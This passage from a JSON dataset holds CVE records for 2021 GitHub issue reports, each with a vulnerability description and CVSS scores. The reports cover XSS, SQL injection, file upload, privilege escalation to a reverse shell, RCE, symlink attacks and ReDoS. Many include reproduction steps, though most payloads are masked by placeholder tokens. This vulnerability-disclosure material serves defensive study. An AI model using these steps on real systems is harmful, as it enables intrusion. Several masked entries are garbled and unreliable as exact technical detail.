  63887. "Issue_Url_new": "https://github.com/linkedin/oncall/issues/341",
  63888. "Repo_new": "linkedin/oncall",
  63889. "Issue_Created_At": "2021-02-05T11:56:10Z",
  63890. "description": "Reflected Cross Site Scripting in seach bar.. Hi! I've found a reflected cross site scripting vulnerability in Oncall's search bar. I've reported this issue to the APITAG Information Security Response Center back in September NUMBERTAG but Oncall still seems vulnerable to this date. Therefore I decided to report it here. Reproduction NUMBERTAG Navigate to ERRORTAG NUMBERTAG Click on the search bar where it now says ERRORTAG Result By clicking the search bar, a search will be done to the search API endpoint. Because nothing can be found a ERRORTAG message will be shown. Because this message includes the search query and lacks the proper HTML output encoding, the query is interpreted as HTML/JS and an alert containing the APITAG is shown. FILETAG Impact If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can: Steal the user's credentials by altering the working of the displayed login form. Perform any action within the application that the user can perform. View any information that the user is able to view. Modify any information that the user is able to modify. Mitigation In general, effectively preventing XSS vulnerabilities is likely to involve a combination of the following measures: Filter input on arrival. At the point where user input is received, filter as strictly as possible based on what is expected or valid input. Encode data on output. At the point where user controllable data is output in HTTP responses, encode the output to prevent it from being interpreted as active content. Depending on the output context, this might require applying combinations of HTML, URL, APITAG and CSS encoding. Content Security Policy. As a last line of defense, you could use a (default) Content Security Policy (CSP) to reduce the severity of any XSS vulnerabilities that still occur.",
  63891. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  63892. "severity": "MEDIUM",
  63893. "baseScore": 6.1,
  63894. "impactScore": 2.7,
  63895. "exploitabilityScore": 2.8
  63896. },
  63897. {
  63898. "CVE_ID": "CVE-2021-26739",
  63899. "Issue_Url_old": "https://github.com/millken/doyocms/issues/5",
  63900. "Issue_Url_new": "https://github.com/millken/doyocms/issues/5",
  63901. "Repo_new": "millken/doyocms",
  63902. "Issue_Created_At": "2021-02-01T04:26:10Z",
  63903. "description": "There is a sqli vulnerability in APITAG admin user login required. Compared with the previous injection vulnerability, this vulnerability is more harmful because it can be triggered without logging in to the management account. The syntax of the cms filter function is wrong, which causes the filter of the array to not take effect FILETAG in APITAG FILETAG payload\uff1a URLTAG FILETAG",
  63904. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  63905. "severity": "CRITICAL",
  63906. "baseScore": 9.8,
  63907. "impactScore": 5.9,
  63908. "exploitabilityScore": 3.9
  63909. },
  63910. {
  63911. "CVE_ID": "CVE-2021-26740",
  63912. "Issue_Url_old": "https://github.com/millken/doyocms/issues/4",
  63913. "Issue_Url_new": "https://github.com/millken/doyocms/issues/4",
  63914. "Repo_new": "millken/doyocms",
  63915. "Issue_Created_At": "2021-02-01T04:18:20Z",
  63916. "description": "Vulnerabilities can be used to upload files of any type. in FILETAG The first line receives the parameter allow, which is passed in when the APITAG object is instantiated, and when the syupload object is constructed, the passed allow is directly used as the allowed suffix dictionary FILETAG FILETAG So when we upload, we only need to add an allow parameter to upload files with any suffix FILETAG FILETAG",
  63917. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  63918. "severity": "CRITICAL",
  63919. "baseScore": 9.8,
  63920. "impactScore": 5.9,
  63921. "exploitabilityScore": 3.9
  63922. },
  63923. {
  63924. "CVE_ID": "CVE-2021-26758",
  63925. "Issue_Url_old": "https://github.com/litespeedtech/openlitespeed/issues/217",
  63926. "Issue_Url_new": "https://github.com/litespeedtech/openlitespeed/issues/217",
  63927. "Repo_new": "litespeedtech/openlitespeed",
  63928. "Issue_Created_At": "2021-01-31T14:53:13Z",
  63929. "description": "Privilege Escalation Security Issue. Description I found a way to escalate privileges on Ubuntu NUMBERTAG ia APITAG web server that runs with user(nobody):group(nogroup) privilege . According to this vulnerability , system user that has admin panel credentials can add himself to sudo group or shadow group( to read /etc/shadow file) . So that the user can execute command with high privileges. Proof of Concept NUMBERTAG There is a test user that is not member of sudo group. FILETAG NUMBERTAG User changes External App configuration as following to get reverse shell with high privileges. FILETAG FILETAG ERRORTAG NUMBERTAG The user sends a Graceful Restart request through admin panel and get reverse shell with sudo group privileges. FILETAG",
  63930. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  63931. "severity": "HIGH",
  63932. "baseScore": 8.8,
  63933. "impactScore": 5.9,
  63934. "exploitabilityScore": 2.8
  63935. },
  63936. {
  63937. "CVE_ID": "CVE-2021-26776",
  63938. "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/29",
  63939. "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/29",
  63940. "Repo_new": "cskaza/cszcms",
  63941. "Issue_Created_At": "2021-02-02T01:16:34Z",
  63942. "description": "Multiple Stored XSS Cross Site Scripting on CSZ CMS NUMBERTAG Multiple Stored XSS Cross Site Scripting on CSZ CMS NUMBERTAG Login with editor account with rights to Forms Builder, XML Plugin Widgets, Statistic for link, Banner Manager, Carousel Widget, Pages Content, Language, Plugin Manager. Forms Builder Add or edit Forms Builder: Forms Name: APITAG APITAG APITAG \"> XML Plugin Widgets Add or edit Widgets: Widget Name: APITAG APITAG APITAG \"> Statistic for link Add New Link: URL: APITAG APITAG APITAG \"> Banner Manager Add New Banner : Banner Name: APITAG APITAG APITAG \"> Carousel Widget Add new Carousel: Carousel Name: APITAG APITAG APITAG \"> Pages Content Add or edit Pages Content: Pages Name: Abouts Us&lt;noframes&gt;&lt;p PATHTAG NUMBERTAG APITAG NUMBERTAG gt;&quot;&gt; Language Add new Language: Language Name: APITAG APITAG APITAG \"> Plugin Manager Add new Category( PATHTAG ): Category Name: APITAG APITAG APITAG \"> Add new Article( PATHTAG ): Article Name: APITAG APITAG APITAG \">",
  63943. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  63944. "severity": "MEDIUM",
  63945. "baseScore": 5.4,
  63946. "impactScore": 2.7,
  63947. "exploitabilityScore": 2.3
  63948. },
  63949. {
  63950. "CVE_ID": "CVE-2021-26786",
  63951. "Issue_Url_old": "https://github.com/customercentric-selling-poland/playtuber/issues/1",
  63952. "Issue_Url_new": "https://github.com/customercentric-selling-poland/playtuber/issues/1",
  63953. "Repo_new": "customercentric-selling-poland/playtuber",
  63954. "Issue_Created_At": "2021-02-02T16:33:04Z",
  63955. "description": "APITAG FILETAG APITAG with no Limit to Excute php code Vulnerability. read this code in APITAG FILETAG FILETAG We can see that there is no detect the site has installed or not. FILETAG So we can Reinstall the site with our local database to modify the administrator's password to login . And also we can insert php code to FILETAG to excute php code. Submit form like this: FILETAG And we can excute code in FILETAG . FILETAG FILETAG",
  63956. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  63957. "severity": "HIGH",
  63958. "baseScore": 8.8,
  63959. "impactScore": 5.9,
  63960. "exploitabilityScore": 2.8
  63961. },
  63962. {
  63963. "CVE_ID": "CVE-2021-26799",
  63964. "Issue_Url_old": "https://github.com/omeka/Omeka/issues/935",
  63965. "Issue_Url_new": "https://github.com/omeka/omeka/issues/935",
  63966. "Repo_new": "omeka/omeka",
  63967. "Issue_Created_At": "2021-02-03T18:18:22Z",
  63968. "description": "Stored XSS in the PATHTAG page. Hello Omeka Team! I was looking through your application APITAG and I discovered a stored XSS bug at PATHTAG While most of the pages filter out tags that are not in the whitelist when APITAG HTML\" is on, PATHTAG seems to allow them. My guess is that this is not the expected behavior? POC NUMBERTAG Create an item with a file attachment NUMBERTAG Edit the file NUMBERTAG Place ERRORTAG in one of the fields and toggle APITAG HTML\" to on. (An alert should pop up now, but ignore that and save changes NUMBERTAG Access the page containing the file, and an alert should pop up NUMBERTAG APITAG Switch to a different account to verify that this affects all users. Impact: client side code execution This bug shouldn't be very dangerous since it is only available to contributors, admins, and superusers. The session cookie is httponly, and the csrf tokens seem to be set properly (upon first glance). However, the XSS bug can be leveraged in many other ways, and it could increase the impact of a future vulnerability. Therefore, it's probably better to have it fixed. Please let me know if anything is unclear, or if this is not a legitimate issue. Thanks in advance!",
  63969. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  63970. "severity": "MEDIUM",
  63971. "baseScore": 6.1,
  63972. "impactScore": 2.7,
  63973. "exploitabilityScore": 2.8
  63974. },
  63975. {
  63976. "CVE_ID": "CVE-2021-26805",
  63977. "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/395",
  63978. "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/395",
  63979. "Repo_new": "justdan96/tsmuxer",
  63980. "Issue_Created_At": "2021-02-03T07:49:24Z",
  63981. "description": "heap buffer overflow tsmuxer. hello\uff0cguys.I use afl fuzz to test APITAG found a crash. APITAG FILETAG Asan log ERRORTAG gdb ERRORTAG",
  63982. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  63983. "severity": "MEDIUM",
  63984. "baseScore": 5.5,
  63985. "impactScore": 3.6,
  63986. "exploitabilityScore": 1.8
  63987. },
  63988. {
  63989. "CVE_ID": "CVE-2021-26812",
  63990. "Issue_Url_old": "https://github.com/udima-university/moodle-mod_jitsi/issues/67",
  63991. "Issue_Url_new": "https://github.com/udima-university/moodle-mod_jitsi/issues/67",
  63992. "Repo_new": "udima-university/moodle-mod_jitsi",
  63993. "Issue_Created_At": "2021-01-29T12:13:02Z",
  63994. "description": "XSS in FILETAG . The parameter \"nom\" is not filtered properly causing javascript code to be injected. FILETAG FILETAG FILETAG It can be easily triggered by clicking this URL URLTAG",
  63995. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  63996. "severity": "MEDIUM",
  63997. "baseScore": 6.1,
  63998. "impactScore": 2.7,
  63999. "exploitabilityScore": 2.8
  64000. },
  64001. {
  64002. "CVE_ID": "CVE-2021-26834",
  64003. "Issue_Url_old": "https://github.com/alagrede/znote-app/issues/5",
  64004. "Issue_Url_new": "https://github.com/alagrede/znote-app/issues/5",
  64005. "Repo_new": "alagrede/znote-app",
  64006. "Issue_Created_At": "2021-02-03T14:00:34Z",
  64007. "description": "Multiple Stored XSS . APITAG Multiple XSS payloads are available for znote. It leads to attacker's javascript execution APITAG You can try with copy paste the payloads below NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG",
  64008. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  64009. "severity": "MEDIUM",
  64010. "baseScore": 5.4,
  64011. "impactScore": 2.7,
  64012. "exploitabilityScore": 2.3
  64013. },
  64014. {
  64015. "CVE_ID": "CVE-2021-26835",
  64016. "Issue_Url_old": "https://github.com/Zettlr/Zettlr/issues/1716",
  64017. "Issue_Url_new": "https://github.com/zettlr/zettlr/issues/1716",
  64018. "Repo_new": "zettlr/zettlr",
  64019. "Issue_Created_At": "2021-02-05T17:23:04Z",
  64020. "description": "Cross site scripting leads to Remote Code Execution. Description XSS leads to remote code execution Reproducing NUMBERTAG Download the crafted .md file ( URLTAG Or make the md file by yourself. FILETAG content: APITAG NUMBERTAG Open the file with Zettlr APITAG Version NUMBERTAG Once the page refresh or you can click anywhere for refreshing, calculator pops up. APITAG Expected behaviour XSS payload shouldn't execute Set APITAG as false Platform OS and version: Windows NUMBERTAG Zettlr Version NUMBERTAG Additional information",
  64021. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  64022. "severity": "MEDIUM",
  64023. "baseScore": 6.1,
  64024. "impactScore": 2.7,
  64025. "exploitabilityScore": 2.8
  64026. },
  64027. {
  64028. "CVE_ID": "CVE-2021-26843",
  64029. "Issue_Url_old": "https://github.com/blueness/sthttpd/issues/14",
  64030. "Issue_Url_new": "https://github.com/blueness/sthttpd/issues/14",
  64031. "Repo_new": "blueness/sthttpd",
  64032. "Issue_Created_At": "2021-01-26T20:14:02Z",
  64033. "description": "Potential memory corruption/crash due to overlapping strcpy arguments. When building sthttpd with ASAN ( APITAG ) I noticed a number of crashes with trivial requests such as the following: APITAG The problem is most visible on systems where strcpy is implemented using memcpy (e.g. GLIBC and APITAG here we end up with memcpy on overlapping memory ranges: ERRORTAG Regardless of whether the server crashes, the behaviour of strcpy with overlapping source and destination is warned against in the manpage as the resulting behaviour is undefined. As the trace above shows, the offending call happens from URLTAG",
  64034. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  64035. "severity": "HIGH",
  64036. "baseScore": 7.5,
  64037. "impactScore": 3.6,
  64038. "exploitabilityScore": 3.9
  64039. },
  64040. {
  64041. "CVE_ID": "CVE-2021-26916",
  64042. "Issue_Url_old": "https://github.com/nopSolutions/nopCommerce/issues/5322",
  64043. "Issue_Url_new": "https://github.com/nopsolutions/nopcommerce/issues/5322",
  64044. "Repo_new": "nopsolutions/nopcommerce",
  64045. "Issue_Created_At": "2021-02-08T06:57:44Z",
  64046. "description": "XSS issue in the \"discountcode\" parameter. The vulnerability is a reflected XSS in the discountcode URL parameter. If an invalid discount code is entered, the value is reflected directly in the response without HTML encoding. This was tested on Google Chrome, Firefox and Edge with a fresh install of APITAG I have attached a screenshot of the APITAG The cause of the issue is the following line: URLTAG which uses the APITAG function without sanitising the user input. The same code exists in the NUMBERTAG release tag as well: URLTAG Let me know if you require additional information. FILETAG",
  64047. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  64048. "severity": "MEDIUM",
  64049. "baseScore": 6.1,
  64050. "impactScore": 2.7,
  64051. "exploitabilityScore": 2.8
  64052. },
  64053. {
  64054. "CVE_ID": "CVE-2021-26926",
  64055. "Issue_Url_old": "https://github.com/jasper-software/jasper/issues/264",
  64056. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/264",
  64057. "Repo_new": "jasper-software/jasper",
  64058. "Issue_Created_At": "2021-01-29T10:33:49Z",
  64059. "description": "APITAG heap buffer overflow vulnerability. Hi, there's a heap buffer overflow vulnerability in function APITAG , ( APITAG ) poc: FILETAG please compile the Jasper with ASAN, and run the poc with APITAG . It seems because of the APITAG is not equal with APITAG ERRORTAG",
  64060. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  64061. "severity": "HIGH",
  64062. "baseScore": 7.1,
  64063. "impactScore": 5.2,
  64064. "exploitabilityScore": 1.8
  64065. },
  64066. {
  64067. "CVE_ID": "CVE-2021-26927",
  64068. "Issue_Url_old": "https://github.com/jasper-software/jasper/issues/265",
  64069. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/265",
  64070. "Repo_new": "jasper-software/jasper",
  64071. "Issue_Created_At": "2021-01-29T10:42:37Z",
  64072. "description": "APITAG Null Pointer Access. Hi, There's a Null Pointer Access in APITAG run the poc with APITAG poc: FILETAG",
  64073. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  64074. "severity": "MEDIUM",
  64075. "baseScore": 5.5,
  64076. "impactScore": 3.6,
  64077. "exploitabilityScore": 1.8
  64078. },
  64079. {
  64080. "CVE_ID": "CVE-2021-26948",
  64081. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/410",
  64082. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/410",
  64083. "Repo_new": "michaelrsweet/htmldoc",
  64084. "Issue_Created_At": "2021-01-22T07:34:10Z",
  64085. "description": "SEGV on unknown address NUMBERTAG While fuzzing htmldoc I found a segmentation fault in the APITAG function, in APITAG testcase:(zipped so APITAG accepts it) FILETAG reproduced by running: APITAG htmldoc Version NUMBERTAG git [master NUMBERTAG f9d NUMBERTAG tested on: OS APITAG NUMBERTAG LTS kernel NUMBERTAG generic compiler: clang version NUMBERTAG ubuntu1 Target NUMBERTAG pc linux gnu OS : APITAG Catalina NUMBERTAG F NUMBERTAG APITAG Pro APITAG NUMBERTAG inch, Early NUMBERTAG compiler: Apple clang version NUMBERTAG clang APITAG Install from snap or download mac dmg don't crash for this testcase. addresssanitizer ERRORTAG gdb CODETAG The bug locate in APITAG compare_images. The arguments of compare_images didn't checked so APITAG lead a segfault due to to null pointer.",
  64086. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  64087. "severity": "HIGH",
  64088. "baseScore": 7.8,
  64089. "impactScore": 5.9,
  64090. "exploitabilityScore": 1.8
  64091. },
  64092. {
  64093. "CVE_ID": "CVE-2021-27112",
  64094. "Issue_Url_old": "https://github.com/eddy8/LightCMS/issues/19",
  64095. "Issue_Url_new": "https://github.com/eddy8/lightcms/issues/19",
  64096. "Repo_new": "eddy8/lightcms",
  64097. "Issue_Created_At": "2021-02-06T10:47:54Z",
  64098. "description": "Arbitrary file read & RCE vulnerability in APITAG . Description There is no filtering when downloading external images, which can casue arbitrary file reading and remote code execution. Impact Version lightcms latest version APITAG Steps to Reproduce Arbitrary File Reading FILETAG FILETAG Remote Code Execution Place the php file which wants to be executed on your own server, and download it: FILETAG FILETAG",
  64099. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  64100. "severity": "CRITICAL",
  64101. "baseScore": 9.8,
  64102. "impactScore": 5.9,
  64103. "exploitabilityScore": 3.9
  64104. },
  64105. {
  64106. "CVE_ID": "CVE-2021-27116",
  64107. "Issue_Url_old": "https://github.com/beego/beego/issues/4484",
  64108. "Issue_Url_new": "https://github.com/beego/beego/issues/4484",
  64109. "Repo_new": "beego/beego",
  64110. "Issue_Created_At": "2021-02-07T09:28:17Z",
  64111. "description": "The /proc interface parameter of the admin service is get cpuprof and get memprof commands, which have a symlink attacks vulnerability.. Dear beego Team, I would like to report a security vulnerability in Beego's admin module. The vulnerability code is in the profile.go APITAG and APITAG function does not correctly check whether the created file exists. As a result, Attackers can launch attacks symlink attacks locally. poc code\uff1a URLTAG func APITAG { file, err := APITAG APITAG if err != nil { ERRORTAG creating file: %s\", err) } _, err = APITAG logs for this process\")) if err != nil { APITAG } } $ ln s other/logs cpu APITAG $ go build symlink_attack.go $ ./symlink_attack $ cat other/logs My logs for this process $",
  64112. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  64113. "severity": "HIGH",
  64114. "baseScore": 7.8,
  64115. "impactScore": 5.9,
  64116. "exploitabilityScore": 1.8
  64117. },
  64118. {
  64119. "CVE_ID": "CVE-2021-27186",
  64120. "Issue_Url_old": "https://github.com/fluent/fluent-bit/issues/3044",
  64121. "Issue_Url_new": "https://github.com/fluent/fluent-bit/issues/3044",
  64122. "Repo_new": "fluent/fluent-bit",
  64123. "Issue_Created_At": "2021-02-09T06:49:52Z",
  64124. "description": "NULL dereference on memory allocation error (src/ flb_avro). Bug Report Describe the bug NULL dereference (value returned by flb_malloc is not checked) after memory allocation error (flb_malloc is wrapper on malloc returning NULL on unsuccessful allocation). In most cases this issue will lead to crash via segmentation fault. Vulnerable Code ERRORTAG To Reproduce Problem was identified by source code review. Expected behavior Memory allocation errors should be handled by checking value returned by APITAG Your Environment Version used: Current \"master\" branch Additional context See following recommendations for details: URLTAG",
  64125. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  64126. "severity": "HIGH",
  64127. "baseScore": 7.5,
  64128. "impactScore": 3.6,
  64129. "exploitabilityScore": 3.9
  64130. },
  64131. {
  64132. "CVE_ID": "CVE-2021-27231",
  64133. "Issue_Url_old": "https://github.com/hestiacp/hestiacp/issues/1622",
  64134. "Issue_Url_new": "https://github.com/hestiacp/hestiacp/issues/1622",
  64135. "Repo_new": "hestiacp/hestiacp",
  64136. "Issue_Created_At": "2021-02-15T01:40:20Z",
  64137. "description": "FILETAG APITAG to DA feature request for further info: URLTAG For additional reference, here's an old thread from APITAG with NUMBERTAG possible solutions (mine being the worst of the NUMBERTAG URLTAG",
  64138. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
  64139. "severity": "MEDIUM",
  64140. "baseScore": 5.4,
  64141. "impactScore": 2.5,
  64142. "exploitabilityScore": 2.8
  64143. },
  64144. {
  64145. "CVE_ID": "CVE-2021-27293",
  64146. "Issue_Url_old": "https://github.com/restsharp/RestSharp/issues/1556",
  64147. "Issue_Url_new": "https://github.com/restsharp/restsharp/issues/1556",
  64148. "Repo_new": "restsharp/restsharp",
  64149. "Issue_Created_At": "2021-02-16T20:01:32Z",
  64150. "description": "Fix APITAG This advisory was emailed to the maintainer. Posting here as an issue as requested. Doyensec Vulnerability Advisory Regular Expression Denial of Service APITAG in APITAG Affected Product: APITAG APITAG released versions) Vendor: FILETAG Severity: Medium Vulnerability Class: Denial of Service Status: Open Author: Ben Caller ( FILETAG SUMMARY The .NET library APITAG uses a regular expression which is vulnerable to Regular Expression Denial of Service APITAG when converting strings into APITAG If a server responds with a malicious string, the client using APITAG will be stuck processing it for an exceedingly long time. This allows the remote server to trigger a Denial of Service. TECHNICAL DESCRIPTION The vulnerable regular expression is APITAG in APITAG : URLTAG It is used by the APITAG function when deserializing JSON responses into classes with APITAG properties. Due to the APITAG part containing nested repeats, this regular expression has catastrophic backtracking when processing a long string of digits. The behaviour occurs as long as the digits are not followed immediately by a closing parenthesis ')'. An example of a APITAG payload is APITAG . The space between 'new' and APITAG is required due to pre processing in APITAG : URLTAG The complexity is exponential: increasing the length of the malicious string of digits by one makes processing take about twice as long. On my laptop NUMBERTAG digits takes about NUMBERTAG seconds to process and NUMBERTAG digits takes about NUMBERTAG seconds, so a string with NUMBERTAG digits should take approximately NUMBERTAG years to process. The vulnerable regular expression was first introduced in commit URLTAG REPRODUCTION STEPS The APITAG can be triggered by calling APITAG directly, or by deserializing JSON responses into a class with a property of type APITAG . Example C code to see the effect of the APITAG is attached below. Changing the length of the string of zeroes will change the processing time. CODETAG REMEDIATION Fix APITAG . We propose simply removing the asterisk: APITAG . Doyensec APITAG is an independent security research and development company focused on vulnerability discovery and remediation. We work at the intersection of software development and offensive engineering to help companies craft secure code. Copyright NUMBERTAG by Doyensec LLC. All rights reserved. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given. The information in the advisory is believed to be accurate at the time of publishing based on currently available information, and it is provided as is, as a free service to the community by Doyensec LLC. There are no warranties with regard to this information, and Doyensec LLC does not accept any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.",
  64151. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  64152. "severity": "HIGH",
  64153. "baseScore": 7.5,
  64154. "impactScore": 3.6,
  64155. "exploitabilityScore": 3.9
  64156. },
  64157. {
  64158. "CVE_ID": "CVE-2021-27308",
  64159. "Issue_Url_old": "https://github.com/4images/4images/issues/3",
  64160. "Issue_Url_new": "https://github.com/4images/4images/issues/3",
  64161. "Repo_new": "4images/4images",
  64162. "Issue_Created_At": "2021-02-13T12:30:30Z",
  64163. "description": "4images NUMBERTAG APITAG panel login' Cross Site Scripting. Vulnerable parameter : redirect XSS sample Payload : APITAG APITAG APITAG APITAG Steps to reproduce the vulnerability(POC NUMBERTAG Goto NUMBERTAG images admin panel page (demo APITAG URLTAG NUMBERTAG Enter the APITAG password=opensourcecms) , Turn on the intercept and click on APITAG NUMBERTAG copy paste the XSS payload after PATHTAG NUMBERTAG Forward the request and you can see XSS is triggered. Video POC : URLTAG Impact : With the help of xss attacker can perform social engineering on users by redirecting them from a real website to a fake ones. Attacker can steal their cookies leading to account takeover and download malware on their system, and there are many more attacking scenarios a skilled attacker can perform with XSS.",
  64164. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  64165. "severity": "MEDIUM",
  64166. "baseScore": 4.8,
  64167. "impactScore": 2.7,
  64168. "exploitabilityScore": 1.7
  64169. },
  64170. {
  64171. "CVE_ID": "CVE-2021-27329",
  64172. "Issue_Url_old": "https://github.com/friendica/friendica/issues/9929",
  64173. "Issue_Url_new": "https://github.com/friendica/friendica/issues/9929",
  64174. "Repo_new": "friendica/friendica",
  64175. "Issue_Created_At": "2021-02-14T03:31:00Z",
  64176. "description": "External service interaction (HTTP & DNS). Hello Friendica Team. Issue detail I found a vulnerability issue while testing frendica locally. It is possible to induce the application to perform server side DNS lookups of arbitrary domain names and HTTP request. Bug Description The ability to send requests to other systems can allow the vulnerable server to be used as an attack proxy. By submitting suitable payloads, an attacker can cause the application server to attack other systems that it can interact with. This may include public third party systems, internal systems within the same organization, or services available on the local loopback adapter of the application server itself. Depending on the network architecture, this may expose highly vulnerable internal services that are not otherwise accessible to external attackers. Steps to Reproduce The request: CODETAG The response: CODETAG The DNS and HTTP request received: APITAG More details To make this request doesn't need to be authenticated, the friendica application accepts any request as an attachment and next do the DNS lookup and the HTTP request. Issue remediation You should review the purpose and intended use of the relevant application functionality, and determine whether the ability to trigger arbitrary external service interactions is intended behavior. If so, you should be aware of the types of attacks that can be performed via this behavior and take appropriate measures. These measures might include blocking network access from the application server to other internal systems, and hardening the application server itself to remove any services available on the local loopback adapter. If the ability to trigger arbitrary external service interactions is not intended behavior, then you should implement a whitelist of permitted services and hosts, and block any interactions that do not appear on this whitelist. References External service interaction (DNS) URLTAG FILETAG FILETAG Platform Info This is Friendica, version NUMBERTAG that is running at the web location localhost The database version is NUMBERTAG the post update version is NUMBERTAG APITAG APITAG APITAG mysql Ver NUMBERTAG Distrib NUMBERTAG APITAG for debian linux gnu NUMBERTAG using readline NUMBERTAG",
  64177. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  64178. "severity": "CRITICAL",
  64179. "baseScore": 10.0,
  64180. "impactScore": 6.0,
  64181. "exploitabilityScore": 3.9
  64182. },
  64183. {
  64184. "CVE_ID": "CVE-2021-27343",
  64185. "Issue_Url_old": "https://github.com/SerenityOS/serenity/issues/5317",
  64186. "Issue_Url_new": "https://github.com/serenityos/serenity/issues/5317",
  64187. "Repo_new": "serenityos/serenity",
  64188. "Issue_Created_At": "2021-02-13T05:10:17Z",
  64189. "description": "APITAG Read buffer overflow in Crypto::der_decode_sequence. Found with APITAG File: FILETAG (with txt extension to allow uploading to GH) Trace: ERRORTAG",
  64190. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  64191. "severity": "HIGH",
  64192. "baseScore": 7.5,
  64193. "impactScore": 3.6,
  64194. "exploitabilityScore": 3.9
  64195. },
  64196. {
  64197. "CVE_ID": "CVE-2021-27345",
  64198. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/164",
  64199. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/164",
  64200. "Repo_new": "ckolivas/lrzip",
  64201. "Issue_Created_At": "2020-09-02T08:51:40Z",
  64202. "description": "Segmentation fault caused by null pointer deference during multithread processing in ucompthread, stream.c NUMBERTAG Hi, there. There is a segmentation caused by null pointer deference that caused a fatal error during the execution. Here is a brief explanation: APITAG This is the output during execution: ~~~~ Decompressing... Bad checksum NUMBERTAG b NUMBERTAG f NUMBERTAG expected NUMBERTAG c Fatal error exiting Segmentation fault ~~~~ To reproduce, run: ~~~~ lrzip t seg stream NUMBERTAG POC (unzip first): FILETAG Here is the trace reported by ASAN NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f8d8 bp NUMBERTAG cd NUMBERTAG sp NUMBERTAG f NUMBERTAG dafdd NUMBERTAG T NUMBERTAG f8d7 in ucompthread .. APITAG NUMBERTAG f NUMBERTAG fc6b9 in start_thread ( PATHTAG NUMBERTAG f NUMBERTAG d2e NUMBERTAG c in clone ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV .. APITAG ucompthread Thread T3 created by T0 here NUMBERTAG f NUMBERTAG e3 in pthread_create ( PATHTAG NUMBERTAG f3 in create_pthread .. APITAG NUMBERTAG f3 in fill_buffer .. APITAG NUMBERTAG f3 in read_stream .. APITAG NUMBERTAG ABORTING ~~~~",
  64203. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  64204. "severity": "MEDIUM",
  64205. "baseScore": 5.5,
  64206. "impactScore": 3.6,
  64207. "exploitabilityScore": 1.8
  64208. },
  64209. {
  64210. "CVE_ID": "CVE-2021-27347",
  64211. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/165",
  64212. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/165",
  64213. "Repo_new": "ckolivas/lrzip",
  64214. "Issue_Created_At": "2020-09-04T05:44:38Z",
